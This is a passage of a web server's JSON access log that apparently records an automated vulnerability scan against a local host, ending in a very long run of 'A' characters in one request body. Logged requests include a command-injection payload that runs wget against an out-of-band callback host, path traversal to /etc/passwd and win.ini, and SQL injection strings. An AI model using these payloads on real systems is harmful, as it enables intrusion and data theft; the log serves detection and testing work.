+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"admuser=admin&admpass=;wget http://ca285tosmpvbafqg07h09t5r4h9t4mxmu.oast.fun;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /goform/setSysAdm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/login.shtml", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /VirtualEms/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-push.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/Dashboard.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fiori HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/tenants HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v0.1/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:24 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA